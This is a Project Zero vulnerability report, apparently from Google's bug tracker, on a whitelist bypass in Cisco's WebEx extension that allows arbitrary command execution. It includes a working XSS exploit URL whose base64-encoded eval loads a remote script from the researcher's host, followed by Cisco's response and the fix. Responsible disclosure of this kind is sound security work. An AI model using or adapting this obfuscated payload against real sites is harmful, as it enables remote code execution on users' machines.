Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users
Status: Fixed
Owner:
Closed: Jan 2017
Cc:

Blocked on:
issue 1324

Blocking:
issue 1096



Sign in to add a comment
Cisco: WebEx: New Arbitrary Command Execution in 1.0.5 via Module Whitelist Bypass
Project Member Reported by taviso@google.com, Jan 25 2017 Back to list
In version 1.0.5 of the WebEx extension, Cisco added a GpcComponentName whitelist to prevent exploitation via XSS, preventing  issue 1096 .

This can be defeated by putting a module signed by Cisco under GpcUrlRoot, and tricking the installation routine to overwrite one of the whitelisted modules with it. As I already have a copy of MSVCRT.DLL signed by Cisco, I used this one in my exploit.

This requires an XSS on *.webex.com, but they're unfortunately not difficult to find.

Here is a working example:

https://support.webex.com/support/documentation/wwhelp/wwhimpl/common/html/frameset.htm#?");eval(atob("ZD1kb2N1bWVudDsocz1kLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jay5jbXB4Y2hnOGIuY29tL0pvUGhlaTdhL3dlYmV4LmpzJztkLmhlYWQuYXBwZW5kQ2hpbGQocyk7"));("

(The eval just loads this script: https://lock.cmpxchg8b.com/JoPhei7a/webex.js)

Please note, that the script waits 10 seconds before running calc.exe to make sure everything is loaded.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
Windows 10-2017-01-24-19-23-30.png
822 KB View Download
Project Member Comment 1 by taviso@google.com, Jan 25 2017
Project Member Comment 2 by taviso@google.com, Jan 25 2017
Cc: cisco.ch...@gmail.com rbar...@mozilla.com
Project Member Comment 3 by taviso@google.com, Jan 25 2017
I made some minor changes to the exploit script.
webex.js
7.1 KB View Download
Project Member Comment 4 by taviso@google.com, Jan 26 2017
Response:

Hi Tavis,
 
We are tracking this issue under the same ID as the previously reported issue: PSIRT-0085137008. Please include it on all communication to us regarding this vulnerability. I have also filed CSCvc88943 for our developers to investigate further.

[...]

Project Member Comment 5 by taviso@google.com, Jan 26 2017
Labels: -Restrict-View-Commit
Status: Fixed
It looks like Cisco have released version 1.0.7, which adds a whitelist for the GpcExtName and GpcUnpackName properties that I was using in my exploit.

It looks like they correctly handle Mac and Windows, and have also added some verification on GpcInitCall/GpcExitCall/etc so that functions have to match a RegEx. This looks like a huge improvement.

Another very quick response from Cisco, I continue to be impressed with Cisco's response time.

I do not currently know of any way to defeat this new patch. As the patch is public now, let's mark this fixed.

(Note: I believe the XSS is an independently discovered duplicate of CVE-2009-3731, which is already public).

http://www.webworks.com/Security/2009-0001/
https://web.archive.org/web/20101023162802/http://www.stratsec.net/Research/Advisories/VMWare-WebWorks-XSS
Project Member Comment 6 by taviso@google.com, Jan 26 2017
Cisco's advisory is here

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex

Apparently Firefox and Internet Explorer were also affected, but not on Mac or Linux. I didn't check, but have no reason to doubt Cisco's assessment.
Project Member Comment 7 by mjurczyk@google.com, Feb 3
Labels: -Reported-2017-01-24 Reported-2017-Jan-24
Comment 8 Deleted
Comment 9 Deleted
Comment 10 Deleted
Project Member Comment 11 by taviso@google.com, Jul 6
Blockedon: 1324
Sign in to add a comment